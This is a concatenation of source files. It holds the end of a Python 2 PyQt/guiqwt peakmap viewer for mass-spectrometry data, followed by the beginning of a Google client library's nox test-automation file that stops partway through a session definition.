        mzmax = min(mzmax, self.peakmap_range[3])
        # apply the same limits to both axis pairs so all four axes agree:
        self.set_plot_limits(rtmin, rtmax, mzmin, mzmax, "bottom", "right")
        self.set_plot_limits(rtmin, rtmax, mzmin, mzmax, "top", "left")
        self.replot()
        self.emit(SIG_PLOT_AXIS_CHANGED, self)

    def get_coords(self, evt):
        """Translate a mouse event's pixel position to (rt, mz) axis
        coordinates."""
        return self.invTransform(self.xBottom, evt.x()), self.invTransform(self.yLeft, evt.y())

    def get_items_of_class(self, clz):
        """Yield all plot items whose class is exactly *clz* (no subclass
        matching)."""
        for item in self.items:
            if item.__class__ == clz:
                yield item

    def get_unique_item(self, clz):
        """Return the single plot item of class *clz*, or None if there is
        none; raise if there is more than one."""
        items = set(self.get_items_of_class(clz))
        if len(items) == 0:
            return None
        if len(items) != 1:
            raise Exception("%d instance(s) of %s among CurvePlots items !" % (len(items), clz))
        return items.pop()

    @protect_signal_handler
    def reset_zoom_to_full_map(self, filter_, evt):
        """Zoom out to the full rt/mz range of the peakmap (bound to
        backspace/escape/home keys by PeakmapZoomTool)."""
        rtmin = self.peakmap_range[0]
        rtmax = self.peakmap_range[1]
        mzmin = self.peakmap_range[2]
        mzmax = self.peakmap_range[3]
        self.update_image_limits(rtmin, rtmax, mzmin, mzmax)

    @protect_signal_handler
    def reset_zoom_to_initial_view(self, filter_, evt):
        """Restore the window stored by set_initial_image_limits (bound to
        the space key by PeakmapZoomTool)."""
        self.update_image_limits(self.rtmin, self.rtmax, self.mzmin, self.mzmax)

    @protect_signal_handler
    def start_drag_mode(self, filter_, evt):
        """Begin a rectangle drag-selection at the event position."""
        self.start_at = self.get_coords(evt)
        self.moved = False
        self.dragging = True
        # the rectangle marker and rect_label are created externally in
        # PeakmapPlotter.create_peakmap_labels:
        marker = self.get_unique_item(RectangleShape)
        marker.set_rect(self.start_at[0], self.start_at[1], self.start_at[0], self.start_at[1])
        self.cross_marker.setVisible(False)  # no cross marker when dragging
        self.rect_label.setVisible(1)
        # shift-drag pans instead of zoom-selecting (see stop_drag_mode):
        self.with_shift_key = evt.modifiers() == Qt.ShiftModifier
        self.replot()

    @protect_signal_handler
    def move_in_drag_mode(self, filter_, evt):
        """Track the mouse during a drag-selection, resizing the rectangle
        marker clamped to the peakmap bounds."""
        now = self.get_coords(evt)
        marker = self.get_unique_item(RectangleShape)
        marker.setVisible(1)
        now_rt = max(self.peakmap_range[0], min(now[0], self.peakmap_range[1]))
        now_mz = max(self.peakmap_range[2], min(now[1], self.peakmap_range[3]))
        marker.set_rect(self.start_at[0], self.start_at[1], now_rt, now_mz)
        self.moved = True
        self.replot()

    def mouseReleaseEvent(self, evt):
        # stop_drag_mode is not called immediately when dragging and releasing
        # shift during dragging, so we finish the drag ourselves here.
        if self.dragging:
            self.stop_drag_mode(None, evt)

    @protect_signal_handler
    def stop_drag_mode(self, filter_, evt):
        """Finish a drag-selection: hide the marker and zoom to the dragged
        rectangle (unless shift was held or the mouse never moved)."""
        stop_at = self.get_coords(evt)
        marker = self.get_unique_item(RectangleShape)
        marker.setVisible(0)
        # reactivate cursor
        self.cross_marker.set_pos(stop_at[0], stop_at[1])
        self.cross_marker.setZ(self.get_max_z() + 1)
        # passing None here arrives as np.nan if you call get_rect later, so
        # we use np.nan here:
        marker.set_rect(stop_at[0], stop_at[1], np.nan, np.nan)
        self.dragging = False
        if self.moved and not self.with_shift_key:
            rtmin, rtmax = self.start_at[0], stop_at[0]
            # be sure that rtmin <= rtmax:
            rtmin, rtmax = min(rtmin, rtmax), max(rtmin, rtmax)
            mzmin, mzmax = self.start_at[1], stop_at[1]
            # be sure that mzmin <= mzmax:
            mzmin, mzmax = min(mzmin, mzmax), max(mzmin, mzmax)
            # keep coordinates in peakmap:
            rtmin = max(self.peakmap_range[0], min(self.peakmap_range[1], rtmin))
            rtmax = max(self.peakmap_range[0], min(self.peakmap_range[1], rtmax))
            mzmin = max(self.peakmap_range[2], min(self.peakmap_range[3], mzmin))
            mzmax = max(self.peakmap_range[2], min(self.peakmap_range[3], mzmax))
            self.update_image_limits(rtmin, rtmax, mzmin, mzmax)
        else:
            self.replot()

    @protect_signal_handler
    def do_zoom_view(self, dx, dy, lock_aspect_ratio=False):
        """
        modified version of do_zoom_view from base class,
        we restrict zooming and panning to ranges of peakmap.

        Change the scale of the active axes (zoom/dezoom) according to dx, dy
        dx, dy are tuples composed of (initial pos, dest pos)
        We try to keep initial pos fixed on the canvas as the scale changes
        """
        # See guiqwt/events.py where dx and dy are defined like this:
        #   dx = (pos.x(), self.last.x(), self.start.x(), rct.width())
        #   dy = (pos.y(), self.last.y(), self.start.y(), rct.height())
        # where:
        #   * self.last is the mouse position seen during last event
        #   * self.start is the first mouse position (here, this is the
        #     coordinate of the point which is at the center of the zoomed area)
        #   * rct is the plot rect contents
        #   * pos is the current mouse cursor position
        auto = self.autoReplot()
        self.setAutoReplot(False)
        dx = (-1,) + dx  # adding direction to tuple dx
        dy = (1,) + dy  # adding direction to tuple dy
        if lock_aspect_ratio:
            direction, x1, x0, start, width = dx
            F = 1 + 3 * direction * float(x1 - x0) / width
        axes_to_update = self.get_axes_to_update(dx, dy)
        axis_ids_horizontal = (self.get_axis_id("bottom"), self.get_axis_id("top"))
        axis_ids_vertical = (self.get_axis_id("left"), self.get_axis_id("right"))
        for (direction, x1, x0, start, width), axis_id in axes_to_update:
            lbound, hbound = self.get_axis_limits(axis_id)
            if not lock_aspect_ratio:
                # per-axis zoom factor derived from the mouse movement:
                F = 1 + 3 * direction * float(x1 - x0) / width
            if F * (hbound - lbound) == 0:
                continue
            if self.get_axis_scale(axis_id) == 'lin':
                orig = self.invTransform(axis_id, start)
                vmin = orig - F * (orig - lbound)
                vmax = orig + F * (hbound - orig)
            else:  # log scale
                i_lbound = self.transform(axis_id, lbound)
                i_hbound = self.transform(axis_id, hbound)
                imin = start - F * (start - i_lbound)
                imax = start + F * (i_hbound - start)
                vmin = self.invTransform(axis_id, imin)
                vmax = self.invTransform(axis_id, imax)
            # patch for not "zooming out" beyond the peakmap bounds:
            if axis_id in axis_ids_horizontal:
                vmin = max(vmin, self.peakmap_range[0])
                vmax = min(vmax, self.peakmap_range[1])
            elif axis_id in axis_ids_vertical:
                vmin = max(vmin, self.peakmap_range[2])
                vmax = min(vmax, self.peakmap_range[3])
            self.set_axis_limits(axis_id, vmin, vmax)
        self.setAutoReplot(auto)
        # the signal MUST be emitted after replot, otherwise
        # the receiver won't see the new bounds (don't know why?)
        self.replot()
        self.emit(SIG_PLOT_AXIS_CHANGED, self)

    @protect_signal_handler
    def do_pan_view(self, dx, dy):
        """
        modified version of do_pan_view from base class,
        we restrict zooming and panning to ranges of peakmap.

        Translate the active axes by dx, dy
        dx, dy are tuples composed of (initial pos, dest pos)
        """
        auto = self.autoReplot()
        self.setAutoReplot(False)
        axes_to_update = self.get_axes_to_update(dx, dy)
        axis_ids_horizontal = (self.get_axis_id("bottom"), self.get_axis_id("top"))
        axis_ids_vertical = (self.get_axis_id("left"), self.get_axis_id("right"))
        for (x1, x0, _start, _width), axis_id in axes_to_update:
            lbound, hbound = self.get_axis_limits(axis_id)
            i_lbound = self.transform(axis_id, lbound)
            i_hbound = self.transform(axis_id, hbound)
            delta = x1 - x0
            # shift both bounds by the mouse movement (in pixel space):
            vmin = self.invTransform(axis_id, i_lbound - delta)
            vmax = self.invTransform(axis_id, i_hbound - delta)
            # patch for not "panning out" beyond the peakmap bounds:
            if axis_id in axis_ids_horizontal:
                vmin = max(vmin, self.peakmap_range[0])
                vmax = min(vmax, self.peakmap_range[1])
            elif axis_id in axis_ids_vertical:
                vmin = max(vmin, self.peakmap_range[2])
                vmax = min(vmax, self.peakmap_range[3])
            self.set_axis_limits(axis_id, vmin, vmax)
        self.setAutoReplot(auto)
        # the signal MUST be emitted after replot, otherwise
        # the receiver won't see the new bounds (don't know why?)
        self.replot()
        self.emit(SIG_PLOT_AXIS_CHANGED, self)

    # new-style signal emitted with the (rt, mz) cursor position:
    cursorMoved = pyqtSignal(float, float)

    @protect_signal_handler
    def do_move_marker(self, evt):
        """Forward cursor movements as a cursorMoved(rt, mz) signal in
        addition to the base-class marker handling."""
        super(ModifiedImagePlot, self).do_move_marker(evt)
        rt = self.invTransform(self.xBottom, evt.x())
        mz = self.invTransform(self.yLeft, evt.y())
        self.cursorMoved.emit(rt, mz)
def get_range(*peakmaps):
    """Return the union of the (rtmin, rtmax, mzmin, mzmax, imin, imax)
    ranges over all given peakmaps.

    ``None`` arguments and empty peakmaps are skipped; if nothing remains,
    the all-zero range is returned.
    """
    collected = [pm.get_ranges()[:6] for pm in peakmaps
                 if pm is not None and len(pm)]
    if not collected:
        return 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
    # transpose the per-peakmap tuples into one sequence per coordinate:
    rtmins, rtmaxs, mzmins, mzmaxs, iimins, iimaxs = zip(*collected)
    return min(rtmins), max(rtmaxs), min(mzmins), max(mzmaxs), min(iimins), max(iimaxs)
def create_image_widget():
    """Create an ImageWidget whose plot instance is patched to behave as a
    ModifiedImagePlot (restricted zoom/pan, drag selection)."""
    image_widget = ImageWidget(lock_aspect_ratio=False, xlabel="rt", ylabel="m/z")
    # patch the plot member: reassigning __class__ swaps in our event
    # handlers without re-creating the widget.
    image_widget.plot.__class__ = ModifiedImagePlot
    image_widget.plot.set_axis_direction("left", False)
    image_widget.plot.set_axis_direction("right", False)
    set_x_axis_scale_draw(image_widget)
    set_y_axis_scale_draw(image_widget)
    # hide the colormap axis of the image plot:
    image_widget.plot.enableAxis(image_widget.plot.colormap_axis, False)
    return image_widget
class LabeledPolygonShape(QwtPlotItem):
    """Base class for plot items drawing a labelled rectangle in (rt, mz)
    coordinates on top of the peakmap image.

    ``item`` provides the coordinates (see subclasses), ``label`` is an
    optional text drawn next to the shape.
    """

    __implements__ = (IBasePlotItem,)

    # we implement IBasePlotItem because guiqwt manages these objects in a
    # consistent way, although we have to provide many empty methods below
    # for conforming to the IBasePlotItem API.

    def __init__(self, item, label=None):
        super(LabeledPolygonShape, self).__init__()
        self.item = item
        self.label = label

    # <IBasePlotItem API>
    selected = False

    do_nothing = lambda *a, **kw: None
    set_resizable = set_movable = set_rotatable = set_read_only = set_private = set_selectable\
        = select = unselect = set_item_parameters = get_item_parameter\
        = move_local_point_to = move_local_shape = move_with_selection = do_nothing

    return_false = lambda *a, **kw: False
    # BUG FIX: the original line read "cat_move", a typo which left the
    # IBasePlotItem method "can_move" undefined.  "cat_move" is kept as an
    # alias for backwards compatibility.
    can_resize = can_move = cat_move = can_rotate = is_readonly = is_private = can_select = return_false

    def types(self):
        return (IShapeItemType,)

    def hit_test(self, pos):
        # report a huge distance so these items never win a selection:
        return 99999.99, 0, False, None
    # </IBasePlotItem API>

    # somehow light blue which contrasts to the yellow/red/black colors of
    # the peakmap:
    color = (170, 220, 255)

    def _set_inner_pen_and_brush(self, painter, xMap, yMap):
        """Opaque outline, no fill (used for mass traces / peak ranges)."""
        r, g, b = self.color
        pen = QPen(QColor(r, g, b, 255), 1.0)
        brush = QBrush()
        painter.setPen(pen)
        painter.setBrush(brush)

    def _set_outer_pen_and_brush(self, painter, xMap, yMap):
        """Translucent fill, no outline (used for the overall feature box)."""
        r, g, b = self.color
        pen = QPen()
        brush = QBrush(QColor(r, g, b, 80))
        painter.setPen(pen)
        painter.setBrush(brush)

    def _draw_polygon(self, painter, xMap, yMap, range_tuple):
        """Draw the rectangle given by the first four entries of
        *range_tuple* (rtmin, rtmax, mzmin, mzmax) in plot coordinates."""
        # range_tuple might contain more than four values !
        rtmin, rtmax, mzmin, mzmax = range_tuple[:4]
        points = QPolygonF()
        points.append(QPointF(xMap.transform(rtmin), yMap.transform(mzmin)))
        points.append(QPointF(xMap.transform(rtmin), yMap.transform(mzmax)))
        points.append(QPointF(xMap.transform(rtmax), yMap.transform(mzmax)))
        points.append(QPointF(xMap.transform(rtmax), yMap.transform(mzmin)))
        painter.drawPolygon(points)
        return points

    def _setup_painter(self, painter):
        painter.setRenderHint(QPainter.Antialiasing)
class PeakRangeShape(LabeledPolygonShape):
    """Draws a single outlined rt/mz rectangle plus an optional label."""

    def draw(self, painter, xMap, yMap, canvasRect):
        self._setup_painter(painter)
        self._set_inner_pen_and_brush(painter, xMap, yMap)
        # self.item is sliceable, its first four entries being
        # (rtmin, rtmax, mzmin, mzmax):
        self._draw_polygon(painter, xMap, yMap, self.item)
        if self.label is not None:
            self._draw_label(painter, xMap, yMap)

    def _draw_label(self, painter, xMap, yMap):
        self.text = QTextDocument()
        self.text.setDefaultStyleSheet("""div { color: rgb(%d, %d, %d); }""" % self.color)
        self.text.setHtml("<div>%s</div>" % (self.label, ))
        # place the label right of the rectangle, vertically centered on the
        # rectangle's m/z midpoint:
        label_x = xMap.transform(self.item.rtmax)
        label_y = yMap.transform(0.5 * self.item.mzmin + 0.5 * self.item.mzmax)
        text_height = self.text.size().height()
        painter.translate(label_x, label_y - 0.5 * text_height)
        self.text.drawContents(painter)
class FeatureShape(LabeledPolygonShape):
    """Draws a feature as a translucent bounding box with outlined mass
    traces inside, plus an optional label."""

    def draw(self, painter, xMap, yMap, canvasRect):
        self._setup_painter(painter)
        # translucent outer box spanning the whole feature:
        self._set_outer_pen_and_brush(painter, xMap, yMap)
        bounds = (self.item.rtmin, self.item.rtmax, self.item.mzmin, self.item.mzmax)
        self._draw_polygon(painter, xMap, yMap, bounds)
        # opaque outlines for the individual mass traces:
        self._set_inner_pen_and_brush(painter, xMap, yMap)
        for trace in self.item.mass_traces:
            self._draw_polygon(painter, xMap, yMap, trace)
        if self.label is not None:
            self._draw_label(painter, xMap, yMap)

    def _draw_label(self, painter, xMap, yMap):
        self.text = QTextDocument()
        self.text.setDefaultStyleSheet("""div { color: rgb(%d, %d, %d); }""" % self.color)
        self.text.setHtml("<div>%s</div>" % (self.label, ))
        label_x = xMap.transform(self.item.rtmax)
        # vertical position: between the m0 and m1 mass traces if m1 exists,
        # else at the height of m0:
        trace_mz_mins = sorted(m.mzmin for m in self.item.mass_traces)
        if len(trace_mz_mins) >= 2:
            label_y = yMap.transform(0.5 * trace_mz_mins[0] + 0.5 * trace_mz_mins[1])
        else:
            label_y = yMap.transform(trace_mz_mins[0])
        text_height = self.text.size().height()
        painter.translate(label_x, label_y - 0.5 * text_height)
        self.text.drawContents(painter)
class PeakmapPlotter(QWidget):
    """Widget wrapping the patched image plot; plots one (or two) peakmaps
    with optional feature / peak-range overlays.

    Unknown attribute accesses are delegated to the underlying
    ModifiedImagePlot (see __getattr__).
    """

    def __init__(self, parent):
        super(PeakmapPlotter, self).__init__(parent)
        self.layout = QGridLayout(self)
        self.widget = create_image_widget()
        self.image_item = None
        self.extra_items = []
        sizePolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        self.widget.setSizePolicy(sizePolicy)
        # no margins, the plot fills the whole widget:
        left, top, right, bottom = 0, 0, 0, 0
        self.widget.setContentsMargins(left, top, right, bottom)
        self.layout.setContentsMargins(left, top, right, bottom)
        self.layout.addWidget(self.widget, 0, 0, 1, 1)
        self.widget.plot.cursorMoved.connect(self.marker_moved)
        self.clear()

    def clear(self):
        # reset the display by plotting an empty peakmap:
        pm = PeakMap([])
        self.set_peakmaps(pm, None)

    # re-emitted cursor position signals, see marker_moved:
    cursorMoved = pyqtSignal(float, float)
    cursorMovedRt = pyqtSignal(float)
    cursorMovedMz = pyqtSignal(float)

    def marker_moved(self, rt, mz):
        """Fan out the plot's cursorMoved signal to the three widget-level
        signals above."""
        self.cursorMoved.emit(rt, mz)
        self.cursorMovedRt.emit(rt)
        self.cursorMovedMz.emit(mz)

    def plot_feature(self, peakmap, feature, hit):
        """Show *feature* (labelled with the hit's aa sequence) inside a
        window padded by 30 s in rt and 10 in m/z."""
        self.set_peakmaps(peakmap, None, [(feature, hit.aa_sequence)])
        self.widget.plot.set_initial_image_limits(feature.rtmin - 30.0, feature.rtmax + 30.0,
                                                  feature.mzmin - 10.0, feature.mzmax + 10.0)

    def plot_mass_trace(self, peakmap, rtmin, rtmax, mzmin, mzmax, aa_sequence):
        """Show a single labelled rt/mz rectangle, padded by 10 s in rt and
        3 in m/z."""
        item = PeakRange(rtmin, rtmax, mzmin, mzmax)
        self.set_peakmaps(peakmap, None, [(item, aa_sequence)])
        self.widget.plot.set_initial_image_limits(rtmin - 10.0, rtmax + 10.0, mzmin - 3.0,
                                                  mzmax + 3.0)

    def set_peakmaps(self, peakmap, peakmap2, extra_items=None):
        """Replace the plotted peakmap(s) and overlay items and (re)install
        the interaction tools.

        *extra_items* is a list of (item, label) pairs where item is a
        Feature or a PeakRange.
        """
        self.peakmap = peakmap
        self.peakmap2 = peakmap2
        # only makes sense for gamma, after reload imin/imax and rt/mz bounds will not be
        # valid any more
        if peakmap2 is not None:
            # NOTE(review): dual mode is disabled; image_item keeps its
            # previous value (None after __init__) in this branch — verify
            # before re-enabling RGBPeakMapImageItem.
            pass
            #self.image_item = RGBPeakMapImageItem(peakmap, peakmap2)
        else:
            self.image_item = PeakMapImageItem(peakmap)
        self.widget.plot.peakmap_range = get_range(peakmap, peakmap2)
        self.widget.plot.del_all_items()
        self.widget.plot.add_item(self.image_item)
        if extra_items is not None:
            for item, label in extra_items:
                if isinstance(item, Feature):
                    self.widget.plot.add_item(FeatureShape(item, label))
                if isinstance(item, PeakRange):
                    self.widget.plot.add_item(PeakRangeShape(item, label))
        # widget.plot.reset_history()
        self.create_peakmap_labels()
        # for zooming and panning with mouse drag:
        t = self.widget.add_tool(SelectTool)
        self.widget.set_default_tool(t)
        t.activate()
        # for selecting zoom window
        t = self.widget.add_tool(PeakmapZoomTool)
        t.activate()

    def move_marker_to_rt(self, rt):
        """Move the cross marker horizontally to *rt*, keeping its m/z."""
        __, mz = self.cross_marker.get_pos()
        self.cross_marker.set_pos(rt, mz)
        self.replot()

    def create_peakmap_labels(self):
        """Install the rectangle drag-marker, its info label and the cross
        marker on the plot; also styles both markers via CONF."""
        plot = self.widget.plot
        rect_marker = RectangleShape()
        rect_label = make.info_label("TR", [PeakmapCursorRangeInfo(rect_marker)], title=None)
        rect_label.labelparam.label = ""
        rect_label.setVisible(1)
        # stored on the plot, used by ModifiedImagePlot.start_drag_mode:
        plot.rect_label = rect_label
        plot.add_item(rect_label)
        params = {
            "shape/drag/symbol/size": 0,
            "shape/drag/line/color": "#cccccc",
            "shape/drag/line/width": 1.5,
            "shape/drag/line/alpha": 0.4,
            "shape/drag/line/style": "SolidLine",
        }
        CONF.update_defaults(dict(plot=params))
        rect_marker.shapeparam.read_config(CONF, "plot", "shape/drag")
        rect_marker.shapeparam.update_shape(rect_marker)
        rect_marker.setVisible(0)
        rect_marker.set_rect(0, 0, np.nan, np.nan)
        plot.add_item(rect_marker)

        plot.canvas_pointer = True  # x-cross marker on
        # we hack label_cb for updating legend:
        def label_cb(rt, mz):
            # passing None here arrives as np.nan if you call get_rect later,
            # so we use np.nan here:
            rect_marker.set_rect(rt, mz, np.nan, np.nan)
            return ""
        cross_marker = plot.cross_marker
        cross_marker.label_cb = label_cb
        params = {
            "marker/cross/line/color": "#cccccc",
            "marker/cross/line/width": 1.5,
            "marker/cross/line/alpha": 0.4,
            "marker/cross/line/style": "DashLine",
            "marker/cross/symbol/marker": "NoSymbol",
            "marker/cross/markerstyle": "Cross",
        }
        CONF.update_defaults(dict(plot=params))
        cross_marker.markerparam.read_config(CONF, "plot", "marker/cross")
        cross_marker.markerparam.update_marker(cross_marker)
        self.cross_marker = cross_marker
        self.rect_marker = rect_marker

    def clear_plot(self):
        self.widget.plot.del_all_items()
        self.replot()

    def replot(self):
        self.widget.plot.replot()

    def __getattr__(self, name):
        # delegate everything we do not implement to the underlying plot:
        return getattr(self.widget.plot, name)

    def get_plot(self):
        return self.widget.plot

    def paint_pixmap(self):
        return self.image_item.paint_pixmap(self.widget)

    def set_processing_parameters(self, parameters):
        """Forward intensity-scaling parameters to the image item and
        redraw."""
        self.image_item.set_processing_parameters(parameters)
        self.replot()
class PeakMapExplorer(QDialog):
    """Top-level dialog showing a PeakmapPlotter next to its intensity
    scaling parameter panel."""

    def __init__(self, parent=None):
        super(PeakMapExplorer, self).__init__(parent)
        self.setWindowFlags(Qt.Window)
        self.setAttribute(Qt.WA_DeleteOnClose)
        # NOTE(review): setWindowFlags(Qt.Window) is called twice; the second
        # call looks redundant.
        self.setWindowFlags(Qt.Window)

    def keyPressEvent(self, e):
        # swallow escape so it does not close the dialog (escape is used by
        # the plot for resetting the zoom):
        if e.key() != Qt.Key_Escape:
            super(PeakMapExplorer, self).keyPressEvent(e)

    def setup(self, peakmap, peakmap2=None, extra_items=None):
        """Build the widgets, wire up signals and display the peakmap(s).
        Must be called before showing the dialog."""
        self.setup_widgets_and_layout()
        self.connect_signals_and_slots()
        self.setup_peakmap_plotter(peakmap, peakmap2, extra_items)
        self.setup_processing_parameters()
        self.plot_peakmap()

    def connect_signals_and_slots(self):
        self.params.paramsChanged.connect(self.peakmap_plotter.set_processing_parameters)

    def setup_processing_parameters(self):
        # requires self.imin/self.imax from setup_peakmap_plotter:
        self.params.setup_initial_values(gamma_min=0.05,
                                         gamma_max=10.0,
                                         gamma_start=4.0,
                                         log_scale=True,
                                         imin=self.imin,
                                         imax=self.imax)

    def setup_peakmap_plotter(self, peakmap, peakmap2, extra_items):
        """Remember the peakmaps and compute the overall rt/mz/intensity
        range.

        NOTE(review): extra_items is accepted but never used here, so items
        passed to inspectPeakMap never reach PeakmapPlotter.set_peakmaps —
        verify against callers.
        """
        self.peakmap = peakmap  # .getDominatingPeakmap()
        self.dual_mode = peakmap2 is not None
        self.peakmap2 = peakmap2
        if self.dual_mode:
            self.peakmap2 = peakmap2.getDominatingPeakmap()
        (self.rtmin, self.rtmax, self.mzmin, self.mzmax,
         self.imin, self.imax) = get_range(peakmap, peakmap2)
        # jparam = PeakMapProcessingParameters(self.params.gamma_start, True, 0, self.imax)
        # self.peakmap_plotter.set_processing_parameters(param)

    def plot_peakmap(self):
        # update_image_limits is resolved on the underlying plot via
        # PeakmapPlotter.__getattr__; includes replot:
        self.peakmap_plotter.update_image_limits(self.rtmin, self.rtmax, self.mzmin, self.mzmax)

    def setup_widgets_and_layout(self):
        """Create the splitter layout: plot on the left, parameter panel on
        the right."""
        sizePolicy = QSizePolicy(QSizePolicy.Maximum, QSizePolicy.Maximum)
        sizePolicy.setHorizontalStretch(1)
        sizePolicy.setVerticalStretch(1)
        sizePolicy.setHeightForWidth(self.sizePolicy().hasHeightForWidth())
        self.setSizePolicy(sizePolicy)
        self.gridLayout = QGridLayout(self)
        self.splitter = QSplitter(self)
        self.splitter.setOrientation(Qt.Horizontal)
        self.peakmap_plotter = PeakmapPlotter(self.splitter)
        self.verticalLayoutWidget = QWidget(self.splitter)
        self.verticalLayout = QVBoxLayout(self.verticalLayoutWidget)
        self.verticalLayout.setMargin(0)
        self.params = PeakMapScalingParameters(self.verticalLayoutWidget)
        sizePolicy = QSizePolicy(QSizePolicy.Maximum, QSizePolicy.Maximum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.params.sizePolicy().hasHeightForWidth())
        self.params.setSizePolicy(sizePolicy)
        self.verticalLayout.addWidget(self.params)
        # spacer pushes the parameter panel to the top of its column:
        spacerItem = QSpacerItem(20, 40, QSizePolicy.Minimum, QSizePolicy.MinimumExpanding)
        self.verticalLayout.addItem(spacerItem)
        self.gridLayout.addWidget(self.splitter, 0, 0, 1, 1)
def inspectPeakMap(peakmap, peakmap2=None, extra_items=None, table=None, modal=True, parent=None):
    """
    allows the visual inspection of a peakmap

    ``table`` is accepted for API compatibility but currently unused.
    """
    app = guidata.qapplication()  # singleton !
    explorer = PeakMapExplorer(parent=parent)
    explorer.setup(peakmap, peakmap2, extra_items)
    if not modal:
        explorer.show()
    else:
        explorer.raise_()
        explorer.exec_()
if __name__ == "__main__":
    # Ad-hoc manual test (Python 2 syntax): open the first non-empty peakmap
    # from a compressed .ivi data file and show up to 50 of its features.
    from ivi.lib.compress_io import CompressedDataReader
    print "open"
    # NOTE(review): hard-coded path, only works on the original developer's
    # machine.
    dr = CompressedDataReader("/Users/uweschmitt/data/dose/collected.ivi")
    print "opened"
    for base_name in dr.get_base_names():
        print base_name
        pm = dr.fetch_peak_map(base_name)
        if pm.spectra:
            print "data loaded from", base_name
            hits = dr.get_hits_for_base_name(base_name)
            features = []
            for i, hit in enumerate(hits):
                # collect at most 50 features overall:
                if len(features) < 50:
                    for f in dr.fetch_features_for_hit(hit):
                        features.append(f)
            inspectPeakMap(pm, extra_items=features)
            break
        else:
            raise Exception("peakmap is empty")
| apache-2.0 |
googleapis/python-recommendations-ai | noxfile.py | 29 | 6957 | # -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Generated by synthtool. DO NOT EDIT!
from __future__ import absolute_import
import os
import pathlib
import shutil
import nox
# pinned formatter version and the paths it formats/checks:
BLACK_VERSION = "black==19.10b0"
BLACK_PATHS = ["docs", "google", "tests", "noxfile.py", "setup.py"]

# interpreter versions used by the sessions below:
DEFAULT_PYTHON_VERSION = "3.8"
SYSTEM_TEST_PYTHON_VERSIONS = ["3.8"]
UNIT_TEST_PYTHON_VERSIONS = ["3.6", "3.7", "3.8", "3.9"]

# repository root, used to locate the per-version constraints files:
CURRENT_DIRECTORY = pathlib.Path(__file__).parent.absolute()

# 'docfx' is excluded since it only needs to run in 'docs-presubmit'
nox.options.sessions = [
    "unit",
    "system",
    "cover",
    "lint",
    "lint_setup_py",
    "blacken",
    "docs",
]

# Error if a python version is missing
nox.options.error_on_missing_interpreters = True
@nox.session(python=DEFAULT_PYTHON_VERSION)
def lint(session):
    """Check formatting with black (check-only) and lint with flake8.

    Fails when either tool reports problems.
    """
    session.install("flake8", BLACK_VERSION)
    black_args = ["black", "--check"] + BLACK_PATHS
    session.run(*black_args)
    session.run("flake8", "google", "tests")
@nox.session(python=DEFAULT_PYTHON_VERSION)
def blacken(session):
    """Reformat the code base in place with the pinned black version."""
    session.install(BLACK_VERSION)
    black_args = ["black"] + BLACK_PATHS
    session.run(*black_args)
@nox.session(python=DEFAULT_PYTHON_VERSION)
def lint_setup_py(session):
    """Check that setup.py is valid, including a strict reStructuredText
    check of the long description."""
    session.install("docutils", "pygments")
    check_cmd = ["python", "setup.py", "check", "--restructuredtext", "--strict"]
    session.run(*check_cmd)
def default(session):
    """Install test dependencies and run the unit tests with coverage.

    Shared implementation called by the per-version ``unit`` sessions.
    """
    constraints = str(
        CURRENT_DIRECTORY / "testing" / f"constraints-{session.python}.txt"
    )
    # install test dependencies first, then this package in editable mode:
    session.install("asyncmock", "pytest-asyncio", "-c", constraints)
    session.install("mock", "pytest", "pytest-cov", "-c", constraints)
    session.install("-e", ".", "-c", constraints)

    pytest_args = [
        "py.test",
        "--quiet",
        f"--junitxml=unit_{session.python}_sponge_log.xml",
        "--cov=google/cloud",
        "--cov=tests/unit",
        "--cov-append",
        "--cov-config=.coveragerc",
        "--cov-report=",
        "--cov-fail-under=0",
        os.path.join("tests", "unit"),
    ]
    # forward any extra command line arguments to pytest:
    session.run(*(pytest_args + list(session.posargs)))
@nox.session(python=UNIT_TEST_PYTHON_VERSIONS)
def unit(session):
    """Run the unit test suite."""
    # delegates to the shared implementation above:
    default(session)
@nox.session(python=SYSTEM_TEST_PYTHON_VERSIONS)
def system(session):
    """Run the system test suite.

    Skipped when RUN_SYSTEM_TESTS=false or when no system tests exist.
    """
    constraints_path = str(
        CURRENT_DIRECTORY / "testing" / f"constraints-{session.python}.txt"
    )
    system_test_path = os.path.join("tests", "system.py")
    system_test_folder_path = os.path.join("tests", "system")

    # Check the value of `RUN_SYSTEM_TESTS` env var. It defaults to true.
    if os.environ.get("RUN_SYSTEM_TESTS", "true") == "false":
        session.skip("RUN_SYSTEM_TESTS is set to false, skipping")
    # Install pyopenssl for mTLS testing.
    if os.environ.get("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false") == "true":
        session.install("pyopenssl")
    system_test_exists = os.path.exists(system_test_path)
    system_test_folder_exists = os.path.exists(system_test_folder_path)
    # Sanity check: only run tests if found.
    if not system_test_exists and not system_test_folder_exists:
        session.skip("System tests were not found")

    # Use pre-release gRPC for system tests.
    session.install("--pre", "grpcio")

    # Install all test dependencies, then install this package into the
    # virtualenv's dist-packages.
    session.install("mock", "pytest", "google-cloud-testutils", "-c", constraints_path)
    session.install("-e", ".", "-c", constraints_path)

    # Run py.test against the system tests (single file and/or folder,
    # whichever exists).
    if system_test_exists:
        session.run(
            "py.test",
            "--quiet",
            f"--junitxml=system_{session.python}_sponge_log.xml",
            system_test_path,
            *session.posargs,
        )
    if system_test_folder_exists:
        session.run(
            "py.test",
            "--quiet",
            f"--junitxml=system_{session.python}_sponge_log.xml",
            system_test_folder_path,
            *session.posargs,
        )
@nox.session(python=DEFAULT_PYTHON_VERSION)
def cover(session):
    """Aggregate and check coverage from the unit test runs, then erase it.

    This outputs the combined coverage report (unit test runs only, not
    system test runs) and fails below the 98% threshold.
    """
    session.install("coverage", "pytest-cov")
    report_args = ["coverage", "report", "--show-missing", "--fail-under=98"]
    session.run(*report_args)
    session.run("coverage", "erase")
@nox.session(python=DEFAULT_PYTHON_VERSION)
def docs(session):
